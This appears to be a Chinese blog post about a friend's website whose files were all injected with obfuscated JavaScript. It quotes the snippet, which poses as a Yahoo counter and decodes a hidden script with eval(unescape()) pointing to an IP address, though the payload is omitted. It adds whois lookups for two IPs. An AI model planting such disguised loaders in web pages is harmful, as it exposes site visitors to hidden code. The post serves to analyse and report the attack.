一朋友的网站上所有文件都被黑客加上这样的代码:
HTML中嵌入的javascript内容:
if(typeof(yahoo_counter)!=typeof(1))
//伪装成yahoo counter?
eval(unescape(‘…(省略)’).replace(/||&|`|@|~|$|#|!/g,””));
//把要执行的脚本隐藏以来,通过replace替换冗长模糊字符和unescape解码还原。
var yahoo_counter=1;
目标地址形如http://78.110.175.21/cp/?n
不知他们这样做的目的是为何,可以获取什么样的信息。
$ whois 78.110.175.21
OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: P.O. Box 10096
City: Amsterdam
StateProv:
PostalCode: 1001EB
Country: NL$ whois 195.24.76.251
role: root eSolutions
address: 35, rue John F. Kennedy
address: L-7327 Steinsel
address: Luxembourg
phone: +352 20.500
fax-no: +352 20.500.500
e-mail: info@root.lu
remarks: +————————————+
remarks: | Operational Issues: noc@root.lu |
remarks: | Abuse and Spam: abuse@root.lu |
remarks: +————————————+person: Andy BIERLAIR
address: root eSolutions
address: 35, rue John F. Kennedy
address: L-7327 Steinsel
phone: +352 20.500
fax-no: +352 20.500.500
nic-hdl: AB99-RIPE
mnt-by: ROOT-MNT